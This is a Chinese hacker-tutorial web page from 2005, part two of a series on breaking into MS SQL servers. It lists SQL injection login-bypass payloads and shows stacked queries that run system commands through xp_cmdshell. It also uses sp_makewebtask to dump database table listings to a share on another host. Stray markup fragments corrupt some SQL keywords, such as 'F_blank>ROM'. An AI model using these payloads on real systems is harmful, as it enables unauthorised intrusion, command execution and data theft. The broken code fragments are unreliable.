庞大资源库的计算机教程网站!
设为首页
加入收藏
总编信箱
投稿或申请专栏请先 [登 陆]
首页 操作系统 程序设计 图形图像 媒体动画 机械电子 WEB开发 数 据 库 办公系列 路由技术 网络原理 网络应用
认证考试 安全技术
首页>安全技术>黑客攻防>黑客教程>正文
资料搜索
Google搜索
Google
返回上级列表

推荐文章

快速保存网页中所有图片的方法
Windows中让光驱巧妙“隐身”技
防范非法用户入侵Win 2000/XP系
两款比较典型的ASP木马防范方法
有关表格边框的css语法整理
Windows XP中可以被禁用的服务
SQL Server导出导入数据方法
Javascript所有对象的属性的获
网页(HTML)中的特殊字符
与篮球共舞,尽显模式本色
QQ病毒的手工清除方法
Photoshop为极品美女打造性感睫
天衣无缝:IIS与PHP水火也相容
SQL Server存储过程编写和优化

黑客SQL服务器入侵实战演习(二)

 作者:本站收集   日期:2005-5-17
字号选择〖 〗/ 双击滚屏 单击停止   
3.1为什么使用的是' or 1=1--呢?

   让我们来看看其他例子中使用'or 1=1--的重要性吧。有别于正常的登陆方式,使用这样的登陆方式可能得到正常登陆中不能得到的某些特殊信息。用一个链接中得到的ASP页来打比方:

   http://duck/index.asp?category=food

   在上面这条URL中,'category'是一个变量名,而'food'是赋予该变量的值。为了做到这些(链接成功),

   这个ASP必须包含以下相关的代码(下面也是我们为了演示这个实验所写的代码):

   v_cat = request("category")

   sqlstr="SELECT * F_blank>ROM product WHERE PCategory='" & v_cat & "'"

   set rs=conn.execute(sqlstr)

   正如我们所看到的,变量值将会预先处理然后赋值于'v_cat',也就是说该SQL语句将会变为:

   SELECT * FROM product WHERE PCategory='food'

   这个请求将会返回通过WHERE条件比较后得到的结果,在这个例子中也就是'food'了。现在设想一下如果

   我们把该URL改成这样的话:

   http://duck/index.asp?category=food' or 1=1--

   现在我们的变量v_cat的值就等同于"food' or 1=1--"了,现在如果我们要重新代入那条SQL请求的话,

   那条SQL请求将会是:

   SELECT * FROM product WHERE PCategory='food' or 1=1--'

   现在这个请求将会从product表中选取每一条信息而并不会去理会PCategory是否等于'food'。至于结尾部分的那两条'--'(破折号)则用于‘告诉'MS SQL SERVER忽略结尾最后的那个'(单引号)。有的时候也可以使用'#'(井号)来代替'--'(双破折号)在这里的用法。

   无论如何,如果对方不是一台SQL_blank>服务器(这里指的是MS SQL SERVER),或者你不能使用简单的方法去忽略最后的那个单引号的话,你可以尝试:

   ' or 'a'='a

   这样的话整个SQL请求将会变为:

   SELECT * FROM product WHERE PCategory='food' or 'a'='a'

   它也会返回相同的结果。

   根据实际情况,SQL注入请求是可以有多种动态变化的可能性的:

   ' or 1=1--

   " or 1=1--

   or 1=1--

   ' or 'a'='a

   " or "a"="a

   ') or ('a'='a
4.0如何在SQL注入请求中加入即时执行命令?

   能够进行SQL注入的_blank>服务器通常都是一些疏于做系统性配置检查的机器,此时我们可以尝试使用SQL的命令执行请求。默认的MS SQL服务器是运行在SYSTEM用户级别下的,这等同于系统管理员的执行与访问权限。我们可以使用MS SQL SERVER的扩展储存过程(如master..xp_cmdshell等)来执行远程系统的某些命令:

   '; exec master..xp_cmdshell 'ping 10.10.1.2'--

   若失败可以尝试一下使用"(双引号)代替'(单引号)。

   上面例子中的第二个冒号代表一句SQL请求的结束(也代表了它后面紧跟着一条新SQL命令)。若要检验上面这条PING命令是否成功,你可以在10.10.1.2这台机器上_blank>监听ICMP请求包,并确认它是否来自那台SQL服务器就可以了:

   #tcpdump icmp

   如果你不能从那台SQL服务器中得到PING请求的话,并在SQL请求的返回值中得到错误信息的话,有可能是因为该SQL服务器的管理员限制了WEB用户访问这些储存过程了。

   5.0如何可以获取到我发的SQL请求的相关返回信息呢?

   我们可以使用sp_makewebtask处理过程的相关请求写入URL:

   '; EXEC master..sp_makewebtask "\\10.10.1.3\share\output.html", "SELECT * F_blank>ROM INFORMATION

   _SCHEMA.TABLES"

   但先决条件是目标主机的文件夹“share”属性必须设置为“Everyone”。
上一篇:再教一次:美萍的破解教程    下一篇:黑客SQL服务器入侵实战演习(一)  
[发送给好友]  [关闭窗口]  [返回顶部]   转载请注明来源:www.it00.com   
特别声明: 本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载,但请务必注明出处和原始作者。文章版权归文章原始作者所有。对于被本站转载文章的个人和网站,我们表示深深的谢意。如果本站转载的文章有版权问题请联系编辑人员,我们尽快予以更正。
责任编辑: 原点 投稿作者: 本站收集
信息来源: 网络 录入时间: 2005-5-17
关于我们 - 广告服务 - 版权申明 - 网站地图 - 联系方式 - 总编信箱 - 会员投稿
Copyright ©2005 - 2008 IT00.COM,All Rights Reserved